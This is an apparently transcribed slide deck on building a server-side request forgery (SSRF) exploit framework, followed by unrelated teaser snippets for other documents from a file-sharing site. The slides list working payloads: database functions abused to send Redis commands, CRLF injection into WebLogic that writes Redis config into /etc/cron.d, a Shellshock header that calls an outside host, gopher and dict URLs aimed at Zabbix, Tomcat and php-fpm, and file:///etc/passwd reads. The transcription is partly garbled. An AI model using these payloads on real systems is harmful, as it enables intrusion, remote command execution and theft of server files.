Build Your SSRF Exploit Framework SSRF
|
|
- Lydia Knight
- 6 years ago
- Views:
Transcription
1 Build Your SSRF Exploit Framework SSRF
2 @ringzero
3 KNOW IT HACK IT HOW SSRF SSRF SSRF SSRF SSRF
4 KNOW IT, SSRF? Web Interface
5 KNOW IT SSRF
6 Redis server HTTP server 80 & 8080 SSRF_Interface APP server
7 SSRF ( FingerPrint ) {Payload} DOS( Keep-Alive Always ) users / dirs / files
8 SSRF Request MongoDB MemCache Redis-Server
9 100% OpenSSL (Cookies & User:Pass)
10 OpenSSL TSL HELLO OpenSSL SSL
11 Cookies, USER & PASS,?!!! WEB SERVER 1024 * DOS
12 KNOW IT, SSRF SSRF ( Upload from URL, Import & Export RSS feed) (Oracle MongoDB MSSQL Postgres CouchDB) Webmail (POP3/IMAP/SMTP) (ffpmg, ImageMaic, DOCX, PDF XML )
13 -> SSRF Upload from URL Discuz! Import & Export RSS feed Web Blog XML Wordpress xmlrpc.php
14 XML -> SSRF XXE XSLT Template DTD XML XSLT Processor (Saxon) Output Files XLST -- XML
15 XML Fuzz Cheatsheet ( ) DTD Remote Access <!ENTITY % d SYSTEM " XML External Entity <!ENTITY % file system "file:///etc/passwd" > <!ENTITY % d SYSTEM URL Invocation URL XML Encryption XML <xenc:agreementmethod Algorithm= " <xenc:encryptionproperty Target= " <xenc:cipherreference URI= " <xenc:datareference URI= <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" <roottag>test</roottag>
16 XML Fuzz Cheatsheet Web Services XML Signature XML <Reference URI= WS Policy SOA WS <To xmlns= <ReplyTo xmlns=" <Address> </ReplyTo> WS Addressing Web Services From WS Security JAVA WEB <wsp:policyreference URI= <input message="wooyun" wsa:action=" /> <output message="wooyun" wsa:action=" />
17 XML Fuzz Cheatsheet WS Federation Web Services <fed:federation FederationID=" <fed:federationinclude> <fed:tokenissuername> <mex:metadatareference> <wsa:address> XBRL </mex:metadatareference> <xbrli:identifier scheme=" <link:roletype roleuri= ODATA (edmx) <edmx:reference URI=" <edmx:annotationsreference URI=" STRATML <stratml:source>
18 (MongoDB) -> SSRF > db.copydatabase('\r\nconfig set dbfilename wyssrf\r\nquit\r\n,'test',' :6379') ~]# nc -l -vv 6379 Connection from port 6379 [tcp/*] config set dbfilename wyssrf quit.system.namespaces > db.copydatabase( helo','test',' :22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test',' :9999'); {"errormsg" : "couldn't connect to server :9999"} MongoDB Server
19 (Oracle) -> SSRF UTL_HTTP UTL_TCP UTL_SMTP
20 (PostgresSQL) -> SSRF dblink_send_query() SELECT dblink_send_query( host= dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n password=1 port=6379 sslmode=disable, 'select version(); ); ~]# nc -l -vv 6379 Connection from port 6379 [tcp/*] config set dbfilename wyssrf quit
21 (MSSQL) -> SSRF OpenRowset() SELECT openrowset('sqloledb', 'server= ;uid=sa;pwd=sa;database=master') : OpenDatasource() XP_CMDSHELL SELECT * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa' ).Northwind.dbo.Categories
22 (CouchDB) -> SSRF HTTP API /_replicate POST Content-Type: application/json Accept: application/json { "source" : "recipes", "target" : dict://redis.wuyun.org:6379/flushall, }
23 Webmail (POP3/IMAP/SMTP) -> SSRF QQ 163/126
24 -> SSRF FFmpeg concat: file:///etc/passwd ImageMagick (mvg URL HTTP ) fill 'url( & PDF DOCX XML parsers ( XSLT ) XSLT 100 document(): xml include(): import():
25 HACK IT SSRF
26 HACK IT, SSRF & {payload}? IP (xip.io IP IP) (Redirect CRLF header injection) XXE -> SSRF -> CSRF (Protocols & Wrappers)
27 ? URI Domain.tld url= (wooyun ) 10 / 172 / 192 / 127 IP IP *256**3 + *256**2 + *256 IP = startswith( http ) 302 Redirect CRLF ( Ascii Code ) header injection ASCII %20 -> 0x20 -> %23 -> 0x23 -> # %0d -> 0x0d -> CR \r %0a -> 0x0a-> LF \n %08 -> 0x08 -> BS %00 -> 0x00 -> Null Byte
28 SSRF -> http Discuz! SSRF /forum.php?mod=ajax&action=downremoteimg&message= [img] HTTP Scheme > DICT Scheme 302.php <?php header("location: dict://wuyun.org:6379/set:1:helo ); # set 1 helo \n
29 WebLogic SSRF HTTP ( ) CRLF Header Injection HTTP POST /helo HTTP/1.1 Content-Type: text/xml; charset=utf-8 WebLogic uddiexplorer SSRF User-Agent: Java1.6.0_11 Host: wuyun.org Connection: Keep-Alive SearchPublicRegistries.jsp? operator= rdosearch=name&btnsubmit=search CRLF ->ASCII Code <?xml version="1.0" encoding="utf-8" standalone="yes"?> <env:envelope xmlns:soapenc= xmlns:xsd= xmlns:xsi=" <env:header></env:header><env:body> <find_business generic="2.0" xmlns="urn:uddi-org:api_v2"> <name>%</name></find_business> </env:body></env:envelope> - %0d -> 0x0d-> \r - %0a -> 0x0a -> \n
30 WebLogic SSRF CRLF HTTP 0-day 1 operator= HTTP/1.1 %0d%0a(\r\n) HOST: fuzz.wuyun.com %0d%0a(\r\n) [root@wuyun.org ~]# nc -l 80 POST /helo HTTP/1.1 HOST: fuzz.wuyun.com User-Agent: Java1.6.0_11 Host: wuyun.org 2 operator= %0d%0a(\r\n) config set dir /etc/cron.d/ %0d%0a(\r\n) quit%0d%0a(\r\n) [root@wuyun.org ~]# nc -l 6379 POST /helo config set dir /etc/cron.d/ quit HTTP/1.1
31 WebLogic SSRF operator= %08%08%08%08%08%08 %0d%0a USER ftp SHELLSHOCK %0d%0a POST /cgi-bin/test-cgi%0d%0a PASS ftp User-Agent: () { foo;};echo;/bin/ping cloudeye.me %0d%0a %0d%0a HTTP/1.1 pwd %0d%0a GET /abc%0d%0a
32 WebLogic SSRF (FingerPrint) weblogic.uddi.client.structures.exception.xml_soapexception: Tried all: '1' addresses, but could not connect over HTTP to server: 'fuzz.wuyun.com', port: '88' weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: text/html; charset=utf-8. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: null. weblogic.uddi.client.structures.exception.xml_soapexception: Received a response from url: which did not have a valid SOAP content-type: null. <dispositionreport generic="2.0" operator="
33 DEMO : WebLogic SSRF CRLF + Redis
34 WebLogic SSRF 80% BEA & Oracle 70% WebLogic & 90%
35 SSRF -> Protocols & Wrappers Atlassian Confluence CVE /spaces/viewdefaultdecorator.action?decoratorname=./web-inf/web.xml & /etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=file:///etc/passwd /spaces/viewdefaultdecorator.action?decoratorname=gopher://wuyun.org/_hi Resin-Doc /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=/etc/passwd /resin-doc/resource/tutorial/jndi-appconfig/test?inputfile=gopher://wuyun.org/_hi
36 SSRF -> Protocols & Wrappers PHP Java sun.net. file ftp gopher http https jar mailto netdoc file:// Accessing local filesystem Accessing HTTP(s) URLs ftp:// Accessing FTP(s) URLs php:// Accessing various I/O streams zlib:// Compression Streams data:// Data (RFC 2397) glob:// Find pathnames matching pattern phar:// PHP Archive ssh2:// Secure Shell 2 rar:// RAR expect:// Process Interaction Streams
37 SSRF -> UDP FTP & SMTP & POP3 GET /path HTTP/1.1 POST /path HTTP/1.1 HTTP tftp:// /get helo SMBreplay & BadTunnel WebDav: PUT MOVE DEL UNC Call: \\ \c$\boot.ini tftp ftp telnet dict ldap ldaps http file https ftps scp sftp
38 1 -> SSRF Tomcat Management dict://localhost:8005/shutdown%0d%0a dict://localhost:10050/vfs.file.regexp[/etc/hosts,7] Zabbix Agentd ZBXD? localhost dict://localhost:10050/system.run[ls] Nagios Agentd ZBXD,usr etc var boot Fastcgi ( php-fpm ) gopher://localhost:9000/_...[php_value allow_url_include = On]
39 2 -> SSRF & REDIS 6 Redis 1. www, webshell 2. SSH authotrized_keys Memcached 3. (/var/spool/cron/ & /etc/cron.d/) CouchDB slave of /etc/profile.d/ AOF appendfilename
40 SSRF Memcached Session adminid= Memecached JS/html... vbulletin ( Memcached ) Discuz ( Redis & Memcached )
41 SSRF CouchDB SSRF HTTP /_replicate API SSRF Restful API curl -X PUT ' -d '"/sbin/ifconfig >/tmp/6666"' > CouchDB
42 3 XXE -> SSRF -> CSRF Cor IP /apiws/services/api?wsdl & Cor XML XXE SSRF SSRF API
43 HOW?
44 How Python furl / requests / multiprocessing / time / re (http <GET POST> dict gopher tftp)
45 Keep-Alive: timeout=5 ftp://wuyun.org:6379 Keep-Alive http & dict://wuyun.org:6379, / > db.copydatabase( helo','test',' :22'); {"errmsg" : helo.systemnamespaces failed: " } > db.copydatabase( helo','test',' :6379'); {"errormsg" : "couldn't connect to server :6379"} [root@localhost ~] # curl SSH-2.0-OpenSSH_5.3 Protocol mismatch.
46 SITE : tangscan.com SSRF
47 jboss.py jdwp.py shellshock.py axis2.py jenkins.py smtp.py confluence.py struts2.py couchdb.py mongodb.py tftp.py docker.py php_fastcgi.py jboss invoker war java bash axis2-admin Server jenkins scripts smtp confluence ssrf (gopher) struts2 counchdb WEB API mongodb SSRF tftp udp docker API php_fpm, fastcgi gopher SHELL
48 tomcat.py elasticsearch.py pop.py webdav.py ftp.py portscan.py websphere.py gopher.py pstack.py zentaopms.py hfs.py glassfish.py tomcat /manager/html war ES Groovy pop3 WebDav PUT ftp WebSphere Admin war gopher do anything Apache Hadoop zentopms HFS glassfish war
49 SQLMAP python wyssrf.py config -u -p url
50 SSRF
51
Shankersinh Vaghela Bapu Institue of Technology
Branch: - 6th Sem IT Year/Sem : - 3rd /2014 Subject & Subject Code : Faculty Name : - Nitin Padariya Pre Upload Date: 31/12/2013 Submission Date: 9/1/2014 [1] Explain the need of web server and web browser
More informationOWASPORLANDO. XXE: The Anatomy of an XML Attack. Mike Felch OWASP Orlando
OWASPORLANDO XXE: The Anatomy of an XML Attack About Myself Just a Little Background Sr. Penetration Tester Programming since 1998 Son of a firmware engineer RE / VR / ED Hobbyist Fascination with how
More informationFoundations of Python
Foundations of Python Network Programming The comprehensive guide to building network applications with Python Second Edition Brandon Rhodes John Goerzen Apress Contents Contents at a Glance About the
More information02267: Software Development of Web Services
02267: Software Development of Web Services Week 2 Hubert Baumeister huba@dtu.dk Department of Applied Mathematics and Computer Science Technical University of Denmark Fall 2016 1 Recap Distributed IT
More informationApplication security. Not so obvious vulnerabilities. Nicolas Grégoire / Agarri CERN
Application security Not so obvious vulnerabilities Nicolas Grégoire / Agarri CERN Outline PHP Laxism XML Risks Blacklist Evasion XSLT Madness $ Whoami Nicolas Grégoire / Agarri Founder 13 years of Infosec
More informationLecture Notes course Software Development of Web Services
Lecture Notes course 02267 Software Development of Web Services Hubert Baumeister huba@dtu.dk Fall 2014 Contents 1 Web Service Architecture 1 2 Monitoring Web Services with TCPMon 5 3 XML & Namespaces
More informationComputer Networks. Wenzhong Li. Nanjing University
Computer Networks Wenzhong Li Nanjing University 1 Chapter 8. Internet Applications Internet Applications Overview Domain Name Service (DNS) Electronic Mail File Transfer Protocol (FTP) WWW and HTTP Content
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationHow to work with HTTP requests and responses
How a web server processes static web pages Chapter 18 How to work with HTTP requests and responses How a web server processes dynamic web pages Slide 1 Slide 2 The components of a servlet/jsp application
More information2 Oracle WebLogic Overview Prerequisites Baseline Architecture...6
Table of Contents 1 Oracle Access Manager Integration...1 1.1 Overview...1 1.2 Prerequisites...1 1.3 Deployment...1 1.4 Integration...1 1.5 Authentication Process...1 2 Oracle WebLogic...2 3 Overview...3
More informationDownloading Text and Binary Objects with curl
Downloading Text and Binary Objects with curl Many orchestration and automation processes will need to download content from external or internal sources over protocols like HTTP and FTP. The simple way
More informationApplication Level Protocols
Application Level Protocols 2 Application Level Protocols Applications handle different kinds of content e.g.. e-mail, web pages, voice Different types of content require different kinds of protocols Application
More informationREST Web Services Objektumorientált szoftvertervezés Object-oriented software design
REST Web Services Objektumorientált szoftvertervezés Object-oriented software design Dr. Balázs Simon BME, IIT Outline HTTP REST REST principles Criticism of REST CRUD operations with REST RPC operations
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationQEMU Basic. Create the Hardware System
QEMU Basic In this simple Demo we shall be creating a simple Zynq HW project in 2016.2, exporting to SDK to create the HDF file. This HDF file will be used as the base to create the Linux image in Petalinux.
More informationData Access and Analysis with Distributed, Federated Data Servers in climateprediction.net
Data Access and Analysis with Distributed, Federated Data Servers in climateprediction.net Neil Massey 1 neil.massey@comlab.ox.ac.uk Tolu Aina 2, Myles Allen 2, Carl Christensen 1, David Frame 2, Daniel
More informationCNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies
CNIT 129S: Securing Web Applications Ch 3: Web Application Technologies HTTP Hypertext Transfer Protocol (HTTP) Connectionless protocol Client sends an HTTP request to a Web server Gets an HTTP response
More informationData Avenue REST API. Ákos Hajnal, Zoltán Farkas November, 2015
Data Avenue REST API Ákos Hajnal, Zoltán Farkas November, 2015 What is REST? REST (Representational State Transfer) is an architectural style (Roy Fielding, 2000) client-server model, stateless (individually
More informationImage Security Review Standard V1.0
Image Security Review Standard V1.0 Contents CHAPTER 1 THIRD PARTY COMPONENT SECURITY... 1 APACHE... 1 MYSQL... 1 TOMCAT... 1 OPENSSL... 2 BASH... 2 PHP... 2 NGINX... 2 PROFTPD... 2 CHAPTER 2 CONFIGURATION
More informationHHC 2017 writeup, by RedTeam611
HHC 2017 writeup, by RedTeam611 After you complete the terminal challenges in the snowball games you will then move onto the web server challenges. Our first task to is to investigate the Letters to Santa
More informationChapter 27 WWW and HTTP Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display.
Chapter 27 WWW and HTTP 27.1 Copyright The McGraw-Hill Companies, Inc. Permission required for reproduction or display. 27-1 ARCHITECTURE The WWW today is a distributed client/server service, in which
More informationCA SiteMinder Web Services Security
CA SiteMinder Web Services Security Policy Configuration Guide 12.52 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the Documentation
More informationUnraveling the Mysteries of J2EE Web Application Communications
Unraveling the Mysteries of J2EE Web Application Communications An HTTP Primer Peter Koletzke Technical Director & Principal Instructor Common Problem What we ve got here is failure to commun cate. Captain,
More informationedocs Home > BEA AquaLogic Service Bus 3.0 Documentation > Accessing ALDSP Data Services Through ALSB
Accessing ALDSP 3.0 Data Services Through ALSB 3.0 edocs Home > BEA AquaLogic Service Bus 3.0 Documentation > Accessing ALDSP Data Services Through ALSB Introduction AquaLogic Data Services Platform can
More informationEthernet / TCP-IP - Training Suite Application level protocols
Ethernet / TCP-IP - Training Suite 05 - Application level protocols Application layer protocols 2 World Wide Web HTTP I want HTTP this resource. Hypertext Transfer Protocol (HTTP) Used by the World Wide
More informationNessus Scan Report. Hosts Summary (Executive) Hosts Summary (Executive) Mon, 15 May :27:44 EDT
Nessus Scan Report Mon, 15 May 2017 15:27:44 EDT Table Of Contents Hosts Summary (Executive) 192.168.168.134 Hosts Summary (Executive) [-] Collapse All [+] Expand All 192.168.168.134 Summary Critical High
More informationWS-* Standards. Szolgáltatásorientált rendszerintegráció Service-Oriented System Integration. Dr. Balázs Simon BME, IIT
WS-* Standards Szolgáltatásorientált rendszerintegráció Service-Oriented System Integration Dr. Balázs Simon BME, IIT Outline Integration requirements WS-* standards 2 Integration requirements 3 Integration
More informationSession 8. Reading and Reference. en.wikipedia.org/wiki/list_of_http_headers. en.wikipedia.org/wiki/http_status_codes
Session 8 Deployment Descriptor 1 Reading Reading and Reference en.wikipedia.org/wiki/http Reference http headers en.wikipedia.org/wiki/list_of_http_headers http status codes en.wikipedia.org/wiki/_status_codes
More information7) Malicious File Execution
7) Malicious File Execution Emmanuel Benoist Spring Term 2017 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Table of Contents Examples of Attacks Presentation
More informationDeveloper Internship Opportunity at I-CC
Developer Internship Opportunity at I-CC Who We Are: Technology company building next generation publishing and e-commerce solutions Aiming to become a leading European Internet technology company by 2015
More informationBreaking cloud isolation
Breaking cloud isolation HITB, Amsterdam, 30/05/14 research Short BIO bug hunter (Facebook, Google, Nokia, etc) security researcher CEO and lead security expert of Clouds Between business functions and
More informationAttacks Description - Action Policy
Description - Action Policy The following table describes the attack actions under each attack group: ID 16 125 126 121 118 77 129 123 124 120 Protocol Name Name in Export Logs Description Severity Category
More informationChapter 2: outline. 2.6 P2P applications 2.7 socket programming with UDP and TCP
Chapter 2: outline 2.1 principles of network applications app architectures app requirements 2.2 Web and HTTP 2.3 FTP 2.4 electronic mail SMTP, POP3, IMAP 2.5 DNS 2.6 P2P applications 2.7 socket programming
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationWEB TECHNOLOGIES CHAPTER 1
WEB TECHNOLOGIES CHAPTER 1 WEB ESSENTIALS: CLIENTS, SERVERS, AND COMMUNICATION Modified by Ahmed Sallam Based on original slides by Jeffrey C. Jackson THE INTERNET Technical origin: ARPANET (late 1960
More informationWeb Services and SOA. The OWASP Foundation Laurent PETROQUE. System Engineer, F5 Networks
Web Services and SOA Laurent PETROQUE System Engineer, F5 Networks OWASP-Day II Università La Sapienza, Roma 31st, March 2008 Copyright 2008 - The OWASP Foundation Permission is granted to copy, distribute
More informationHTTP Protocol and Server-Side Basics
HTTP Protocol and Server-Side Basics Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming HTTP Protocol and Server-Side Basics Slide 1/26 Outline The HTTP protocol Environment Variables
More informationTraditional Web Based Systems
Chapter 12 Distributed Web Based Systems 1 Traditional Web Based Systems The Web is a huge distributed system consisting of millions of clients and servers for accessing linked documents Servers maintain
More informationHTTP Reading: Section and COS 461: Computer Networks Spring 2013
HTTP Reading: Section 9.1.2 and 9.4.3 COS 461: Computer Networks Spring 2013 1 Recap: Client-Server Communication Client sometimes on Initiates a request to the server when interested E.g., Web browser
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationProtocols. Application Layer FTP, HTTP, SSH, IMAP. Transport Layer TCP, UDP. Internet Layer IP. Link Layer Ethernet, WiFi
HTTP Protocols Application Layer FTP, HTTP, SSH, IMAP Transport Layer TCP, UDP Internet Layer IP Link Layer Ethernet, WiFi TCP/IP Transmission Control Protocol. Connection-Oriented Reliable source address
More informationDATA COMMUNICATOIN NETWORKING
DATA COMMUNICATOIN NETWORKING Instructor: Ouldooz Baghban Karimi Course Book: Computer Networking, A Top-Down Approach By: Kurose, Ross Introduction Course Overview Basics of Computer Networks Internet
More informationExercise SBPM Session-4 : Web Services
Arbeitsgruppe Exercise SBPM Session-4 : Web Services Kia Teymourian Corporate Semantic Web (AG-CSW) Institute for Computer Science, Freie Universität Berlin kia@inf.fu-berlin.de Agenda Presentation of
More informationApplications Security
Applications Security OWASP Top 10 PyCon Argentina 2018 Objectives Generate awareness and visibility on web-apps security Set a baseline of shared knowledge across the company Why are we here / Trigger
More informationINF5750. RESTful Web Services
INF5750 RESTful Web Services Recording Audio from the lecture will be recorded! Will be put online if quality turns out OK Outline REST HTTP RESTful web services HTTP Hypertext Transfer Protocol Application
More informationApplication Layer: The Web and HTTP Sec 2.2 Prof Lina Battestilli Fall 2017
CSC 401 Data and Computer Communications Networks Application Layer: The Web and HTTP Sec 2.2 Prof Lina Battestilli Fall 2017 Outline Application Layer (ch 2) 2.1 principles of network applications 2.2
More informationProduced by. Mobile Application Development. Higher Diploma in Science in Computer Science. Eamonn de Leastar
Mobile Application Development Higher Diploma in Science in Computer Science Produced by Eamonn de Leastar (edeleastar@wit.ie) Department of Computing, Maths & Physics Waterford Institute of Technology
More informationSCS3004 Networking Technologies Application Layer Protocols
SCS3004 Networking Technologies Application Layer Protocols Dr. Ajantha Atukorale University of Colombo School of Computing (UCSC) 2 TCP/IP Suit Applications and application-layer layer protocols Application:
More informationWriting Servlets and JSPs p. 1 Writing a Servlet p. 1 Writing a JSP p. 7 Compiling a Servlet p. 10 Packaging Servlets and JSPs p.
Preface p. xiii Writing Servlets and JSPs p. 1 Writing a Servlet p. 1 Writing a JSP p. 7 Compiling a Servlet p. 10 Packaging Servlets and JSPs p. 11 Creating the Deployment Descriptor p. 14 Deploying Servlets
More informationTFTP and FTP Basics BUPT/QMUL
TFTP and FTP Basics BUPT/QMUL 2017-04-24 Agenda File transfer and access TFTP (Trivial File Transfer Protocol) FTP (File Transfer Protocol) NFS (Network File System) 2 File Transfer And Access 3 File Transfer
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may
More informationMac OS X Server Web Technologies Administration. For Version 10.3 or Later
Mac OS X Server Web Technologies Administration For Version 10.3 or Later apple Apple Computer, Inc. 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS
More informationCS631 - Advanced Programming in the UNIX Environment
CS631 - Advanced Programming in the UNIX Environment Slide 1 CS631 - Advanced Programming in the UNIX Environment HTTP; Code Reading Department of Computer Science Stevens Institute of Technology Jan Schaumann
More informationWorld Wide Web. Before WWW
FEUP, João Neves World Wide Web Joao.Neves@fe.up.pt CAcer t WoT User Digitally signed by CAcert WoT User DN: cn=cacert WoT User, email=joao.neves@i nescporto.pt, email=b2d718a54c3 83ce1a9d48aa87e2ef 687ee8769f0
More informationSession 8. Introduction to Servlets. Semester Project
Session 8 Introduction to Servlets 1 Semester Project Reverse engineer a version of the Oracle site You will be validating form fields with Ajax calls to a server You will use multiple formats for the
More informationHTTP Console Documentation
HTTP Console Documentation Release 1.0.0 Ahmad Nassri April 02, 2014 Contents 1 text/html 1 2 text/plain 3 3 application/php 5 4 application/xml 7 5 application/json 9 6 API Reference 11 6.1 /ip.....................................................
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC
ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC AGENDA VULNERABILITIES OF WEB EXPLOIT METHODS COUNTERMEASURE About Me DIRECTOR OF FORESEC COUNTER TERRORIST ACTION TEAM RESEARCH
More informationApplication-layer Protocols and Internet Services
Application-layer Protocols and Internet Services Computer Networks Lecture 8 http://goo.gl/pze5o8 Terminal Emulation 2 Purpose of Telnet Service Supports remote terminal connected via network connection
More informationIntroduction to the Cisco ANM Web Services API
1 CHAPTER This chapter describes the Cisco ANM Web Services application programming interface (API), which provides a programmable interface for system developers to integrate with customized or third-party
More informationAttacking Next- Generation Firewalls
Attacking Next- Generation Firewalls Breaking PAN-OS Felix Wilhelm #whoami Security Researcher @ ERNW Research Application and Virtualization Security Recent Research Hypervisors (Xen) Security Appliances
More informationFrom blind XXE to root-level file read access
BLOG WEBSEC ABOUT From blind XXE to root-level file read access Posted on December 12, 2018 by Pieter On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted
More informationPHP unserialize. Pavel Toporkov
PHP unserialize Pavel Toporkov whoami Pavel Toporkov Application Security Specialist at Kaspersky Lab LC/BC CTF team member Unserialize unserialize Creates a PHP value from a stored representation array("foo",
More informationPatch Server for Jamf Pro Documentation
Patch Server for Jamf Pro Documentation Release 0.7.0 Bryson Tyrrell Mar 16, 2018 Contents 1 Change History 3 2 Setup the Patch Server Web Application 7 3 Add Your Patch Server to Jamf Pro 11 4 API Authentication
More informationIt s a PHP unserialization vulnerability Jim, but not as we know it. Sam Thomas
It s a PHP unserialization vulnerability Jim, but not as we know it Sam Thomas WHOAMI Director of Research at Secarma Ltd Research / Application Assessments / Red Teaming Introduction [1] [2] Introduction
More informationXPort Pro Command Reference
XPort Pro Command Reference Part Number 900-558 Revision A September 2009 Copyright & Trademark 2009, Lantronix. All rights reserved. No part of the contents of this book may be transmitted or reproduced
More informationInformation Network Systems The application layer. Stephan Sigg
Information Network Systems The application layer Stephan Sigg Tokyo, November 15, 2012 Introduction 04.10.2012 Introduction to the internet 11.10.2012 The link layer 18.10.2012 The network layer 25.10.2012
More informationLecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing
Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing
More informationSystem Configuration
CHAPTER 2 This chapter provides information about how to use the Setup program to configure your host system for Cisco Configuration Engine, 2.0. Running Setup System configuration for Cisco Configuration
More informationSchema Validation Errors While Parsing Weblogic
Schema Validation Errors While Parsing Weblogic _jdbc-store xmlns:sec="bea.com/ns/weblogic/90/security" PDT Error Management BEA- 141244 Schema validation errors while parsing. XPST0003, An error occurred
More informationSOAP Introduction Tutorial
SOAP Introduction Tutorial Herry Hamidjaja herryh@acm.org 1 Agenda Introduction What is SOAP? Why SOAP? SOAP Protocol Anatomy of SOAP Protocol SOAP description in term of Postal Service Helloworld Example
More information21.1 FTP. Connections
21.1 FTP File Transfer Protocol (FTP) is the standard mechanism provided by TCP/IP for copying a file from one host to another. Although transferring files from one system to another seems simple and straightforward,
More informationSpoilt for Choice Which Integration Framework to choose? Mule ESB. Integration. Kai Wähner
Spoilt for Choice Which Integration Framework to choose? Integration vs. Mule ESB vs. Main Tasks Evaluation of Technologies and Products Requirements Engineering Enterprise Architecture Management Business
More informationApplication Layer: HTTP
Application Layer: HTTP EECS 3214 Slides courtesy of J.F Kurose and K.W. Ross, All Rights Reserved 23-Jan-18 1-1 Chapter 2: outline 2.1 principles of network applications 2.2 Web and HTTP 2.3 electronic
More informationJeff Offutt SWE 642 Software Engineering for the World Wide Web
Networking Basics Behind the World Wide Web Jeff Offutt http://www.cs.gmu.edu/~offutt/ SWE 642 Software Engineering for the World Wide Web Adapted from chapter 1 slides for : Web Technologies : A Computer
More informationNginx HTTP Server. Adopt Nginx for your web applications to make the most of your infrastructure and serve pages faster than ever.
Nginx HTTP Server Adopt Nginx for your web applications to make the most of your infrastructure and serve pages faster than ever element Nedelcu [ ] ~men~e~eri~c::i~li~dce PUBLISHING BIRMINGHAM - MUMBAI
More informationOpen a browser and download the Apache Tomcat 7 and Oracle JDBC 6 JAR from these locations. The Oracle site may require that you register as a user.
Installing Tomcat 7 on CentOS 7 David J. Walling, March 8 th, 2017 Email: david@davidjwalling.com This how to describes a process to download and install Apache Tomcat 7 on a CentOS 7 virtual machine using
More informationREST Easy with Infrared360
REST Easy with Infrared360 A discussion on HTTP-based RESTful Web Services and how to use them in Infrared360 What is REST? REST stands for Representational State Transfer, which is an architectural style
More informationWWW: the http protocol
Internet apps: their protocols and transport protocols Application e-mail remote terminal access Web file transfer streaming multimedia remote file Internet telephony Application layer protocol smtp [RFC
More informationCONTENTS IN DETAIL INTRODUCTION 1 THE FAQS OF LIFE THE SCRIPTS EVERY PHP PROGRAMMER WANTS (OR NEEDS) TO KNOW 1 2 CONFIGURING PHP 19
CONTENTS IN DETAIL INTRODUCTION xiii 1 THE FAQS OF LIFE THE SCRIPTS EVERY PHP PROGRAMMER WANTS (OR NEEDS) TO KNOW 1 #1: Including Another File as a Part of Your Script... 2 What Can Go Wrong?... 3 #2:
More informationMiddleware and Web Services Lecture 3: Application Server
Middleware and Web Services Lecture : Application Server doc. Ing. Tomáš Vitvar, Ph.D. tomas@vitvar.com @TomasVitvar http://vitvar.com Czech Technical University in Prague Faculty of Information Technologies
More informationWebsphere Force Uninstall Application Server 7 Linux Installation
Websphere Force Uninstall Application Server 7 Linux Installation You also use Installation Manager to easily uninstall the packages that it installed. Linux Intel, os=linux,arch=x86, Linux Intel 32 bit
More informationAdvanced Penetration Testing
Advanced Penetration Testing Additional Insights from Georgia Weidman More Guessable Credentials: Apache Tomcat In the course we looked at specific examples of vulnerabilities. My goal was to cover as
More informationCS321: Computer Networks FTP, TELNET, SSH
CS321: Computer Networks FTP, TELNET, SSH Dr. Manas Khatua Assistant Professor Dept. of CSE IIT Jodhpur E-mail: manaskhatua@iitj.ac.in FTP File Transfer Protocol (FTP) is the standard protocol provided
More informationHacking Web Sites OWASP Top 10
Hacking Web Sites OWASP Top 10 Emmanuel Benoist Spring Term 2018 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Web Security: Overview of other security risks
More informationAlpha College of Engineering and Technology. Question Bank
Alpha College of Engineering and Technology Department of Information Technology and Computer Engineering Chapter 1 WEB Technology (2160708) Question Bank 1. Give the full name of the following acronyms.
More informationApplication protocols & presentation layer
Application protocols & presentation layer Suguru Yamaguchi NAIST Overview = Application model = Presentation layer = Large scale services 1 TCP/IP Protocol Suites OSI TCP/IP Processing unit Identification
More informationH1-212 Capture the Flag Solution Author: Corben Douglas
H1-212 Capture the Flag Solution Author: Corben Douglas (@sxcurity) Description: An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident
